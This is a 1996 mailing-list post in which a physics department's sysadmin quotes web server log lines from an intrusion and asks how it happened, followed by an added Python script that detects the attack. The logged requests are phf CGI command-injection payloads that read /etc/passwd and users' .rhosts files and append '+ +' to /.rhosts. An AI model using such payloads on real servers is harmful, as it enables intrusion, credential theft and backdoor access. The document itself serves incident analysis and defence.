Dear Gurus,
I was examining the access_log file of our httpd web server and found a strange access to
our file system, apparently from a web browser at the address xxx.xxx.xxx.xxx. It looks
like a hacker sniffing our system. Does anybody have an idea of how this could
have been done and how to prevent it? How can an external internaut run ls, w and cat
commands? See the important lines below:
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:34:35 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat "+ +" >>%20/.rhosts HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:35:00 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat%20"+ +" >>%20/.rhosts HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20/ HTTP/1.0" 200 492
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:57:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/w HTTP/1.0" 200 220
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:58:31 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/home HTTP/1.0" 200 217
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:01 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users HTTP/1.0" 200 3986
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:02:33 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxx HTTP/1.0" 200 3881
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:03:24 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxx/.rhosts HTTP/1.0" 200 133
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:05:27 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 1948
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:06:28 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 3823
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:08:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxx/.rhosts HTTP/1.0" 200 128
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:10:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 934
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:11:36 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxxx/.rhosts HTTP/1.0" 200 443
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:13:48 -0200] "GET /cgi-bin/phf HTTP/1.0" 200 1262
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:14:23 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:17:49 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1 HTTP/1.0" 200 444
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:18:53 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1/xxxxxxxx HTTP/1.0" 200 316
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:21:13 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx HTTP/1.0" 200 57319
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:23:38 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx/bin HTTP/1.0" 200 232
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:26:52 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxx/xxxxxx HTTP/1.0" 200 7664
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:27:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/Mail HTTP/1.0" 200 1559
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 194
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 1654
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:06 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%01 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:59 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%05 HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%0b HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:30 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo50c HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0c HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:21 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0d HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%0d HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:44 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20%0d HTTP/1.0" 200 81
TIA,
Oyanarte Portilho
Department of Physics
University of Brasilia
Received on Fri Dec 20 1996 - 21:33:28 NZDT
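The lines quoted above all share one marker: an encoded newline (%0a) inside the phf query string, after which the path of a program (ls, w, cat) appears, and the 200 responses with growing byte counts show that program's output being returned. An added example, not part of the original post, a small Python check a defender could run over access_log to flag exactly that pattern; the sample log lines are constructed from the excerpt with documentation addresses in place of the masked ones, and the field names are this example's own. (The remedy at the time was to remove the phf script from cgi-bin.)

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

# Constructed sample lines modelled on the access_log excerpt in the post;
# the addresses are documentation ranges, not the poster's masked ones.
SAMPLE_LOG = """\
203.0.113.9 - - [18/Dec/1996:22:56:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
203.0.113.9 - - [18/Dec/1996:23:13:48 -0200] "GET /cgi-bin/phf HTTP/1.0" 200 1262
203.0.113.9 - - [18/Dec/1996:23:14:23 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
198.51.100.4 - - [18/Dec/1996:23:40:01 -0200] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
"""


def find_cgi_control_char_requests(log_text):
    """Flag requests to /cgi-bin/ whose query string decodes to contain a
    control character. A decoded newline is the signature of the phf hole:
    the script's shell-escaping let 0x0a through, so the shell ran the text
    after it as a second command. Returns one dict per finding."""
    findings = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        parts = m.group("request").split(" ")
        if len(parts) < 2:
            continue                         # empty or malformed request line
        url = urlsplit(parts[1])
        if not url.path.startswith("/cgi-bin/"):
            continue
        query = unquote(url.query)           # %0a -> "\n", %20 -> " ", ...
        if not any(ord(c) < 0x20 for c in query):
            continue
        # Text after the first newline is what the shell would have executed.
        injected = query.split("\n", 1)[1].strip() if "\n" in query else ""
        findings.append({"host": m.group("host"), "time": m.group("time"),
                         "script": url.path, "injected": injected,
                         "bytes": 0 if m.group("bytes") == "-" else int(m.group("bytes"))})
    return findings


if __name__ == "__main__":
    for f in find_cgi_control_char_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['script']}: {f['injected']!r} ({f['bytes']} bytes)")
```

The byte count of each flagged response is worth keeping: a 9765-byte reply to a request that decodes to `cat /etc/passwd` tells you the file was disclosed, not merely requested.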